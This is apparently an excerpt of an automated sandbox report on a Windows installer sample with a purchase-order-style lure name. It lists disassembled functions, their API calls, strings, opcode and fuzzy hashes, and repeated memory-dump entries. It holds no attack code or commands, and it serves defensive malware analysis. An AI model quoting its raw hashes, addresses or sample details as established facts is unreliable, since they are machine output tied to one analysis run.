                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                • Instruction ID: ac3b44bde4cff7d728b8f73da7dc3c4418e617d20a2d9e9616a9aba5531653cc
                • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                • Instruction Fuzzy Hash: 4FC04C75744600BAEA148F549E45F0677546790701F14C429B641B54D0CA74D410DA2C
                Function 004034C2 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                Download Yara Rule
                APIs
                • SetFilePointer.KERNELBASE(?,00000000,00000000,00403242,?), ref: 004034D0
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                Function 004044AB Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                Function 00404498 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                Download Yara Rule
                APIs
                • KiUserCallbackDispatcher.NTDLL(?,0040426F), ref: 004044A2
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CallbackDispatcherUser
                • String ID:
                • API String ID: 2492992576-0
                • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D

                Non-executed Functions

                Function 00406160 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130memorystringCOMMON
                Download Yara Rule
                APIs
                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062FB,?,?), ref: 0040619B
                • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061A4
                  • Part of subcall function 00405F6F: lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000), ref: 00405F7F
                  • Part of subcall function 00405F6F: lstrlenA.KERNEL32(?,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000), ref: 00405FB1
                • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 004061C1
                • wsprintfA.USER32 ref: 004061DF
                • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?), ref: 0040621A
                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406229
                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00406261
                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062B7
                • GlobalFree.KERNEL32(00000000), ref: 004062C8
                • CloseHandle.KERNEL32(00000000), ref: 004062CF
                  • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(?,004030BD,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,80000000,00000003), ref: 0040600E
                  • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                • String ID: %ls=%ls$[Rename]$Uz$]z
                • API String ID: 2171350718-2939442745
                • Opcode ID: 4a8f923ecd3868fcc62f38f654b5519550448c5a84d4b02ffe541a827d0a2b5c
                • Instruction ID: 21e35848ad9e0a4f6d0f4344ae9360a4b2933efdadd7627ed2dc2072c6695f7b
                • Opcode Fuzzy Hash: 4a8f923ecd3868fcc62f38f654b5519550448c5a84d4b02ffe541a827d0a2b5c
                • Instruction Fuzzy Hash: 2D313771600715BBD220BB659D48F2B3A5CDF86764F16003EFD42F62C2EA7C9821867D
                Function 00402F93 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40timeCOMMON
                Download Yara Rule
                APIs
                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                • MulDiv.KERNEL32(000D5D38,00000064,000D5F3C), ref: 00402FDC
                • wsprintfW.USER32 ref: 00402FEC
                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Text$ItemTimerWindowwsprintf
                • String ID: 8]$<_$verifying installer: %d%%
                • API String ID: 1451636040-2917703732
                • Opcode ID: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                • Instruction ID: 93fc8baa8d380bd3002b945ae1bdcf8604075b20dc3457daa0419b6feabf18a2
                • Opcode Fuzzy Hash: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                • Instruction Fuzzy Hash: EC014F7064020DBBEF209F60DE4ABEA3B79EB00345F108039FA06B51D0DBB99A559B58
                Function 004044DD Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                Download Yara Rule
                APIs
                • GetWindowLongW.USER32(?,000000EB), ref: 004044FA
                • GetSysColor.USER32(00000000), ref: 00404538
                • SetTextColor.GDI32(?,00000000), ref: 00404544
                • SetBkMode.GDI32(?,?), ref: 00404550
                • GetSysColor.USER32(?), ref: 00404563
                • SetBkColor.GDI32(?,?), ref: 00404573
                • DeleteObject.GDI32(?), ref: 0040458D
                • CreateBrushIndirect.GDI32(?), ref: 00404597
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                • String ID:
                • API String ID: 2320649405-0
                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                • Instruction ID: 307f0adb03de418db05ce456a6e98ecd908ab5abab62206e0655cd74099b0a55
                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                • Instruction Fuzzy Hash: 702197B1501708BFD7309F28DD08B5BBBF8AF80714B00852EEA92A22E1D738D914CB54
                Function 004067A1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                Download Yara Rule
                APIs
                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76A13420,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406804
                • CharNextW.USER32(?,?,?,00000000,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406813
                • CharNextW.USER32(?,00000000,76A13420,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406818
                • CharPrevW.USER32(?,?,76A13420,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 0040682B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Char$Next$Prev
                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                • API String ID: 589700163-2977677972
                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                • Instruction ID: df5be6298df38fe53a3c1647d4a953459580f705d81a6df7816dadf9acb4bb56
                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                • Instruction Fuzzy Hash: C0110D2680161295DB3037149D84A7766F8EF58BA4F56803FED86732C0F77C4C9286BD
                Function 00405EF1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527
                  • Part of subcall function 00405E94: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,?,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76A13420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
                  • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
                  • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF
                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,?,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76A13420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F4A
                • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,?,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76A13420,C:\Users\user\AppData\Local\Temp\), ref: 00405F5A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nstDD9E.tmp
                • API String ID: 3248276644-1123221927
                • Opcode ID: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                • Instruction ID: 6b34473ccab7fedc8ccd770ab5d77ed9e65f07289ecf91379f8b64e60d69f16d
                • Opcode Fuzzy Hash: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                • Instruction Fuzzy Hash: 64F0F43A105D5325D622333A5C09AAF1609CEC2328B19093FF992B22D1DB3CCA438D6E
                Function 00405E94 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                Download Yara Rule
                APIs
                • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,?,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76A13420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
                • CharNextW.USER32(00000000), ref: 00405EA7
                • CharNextW.USER32(00000000), ref: 00405EBF
                Strings
                • C:\Users\user\AppData\Local\Temp\nstDD9E.tmp, xrefs: 00405E95
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
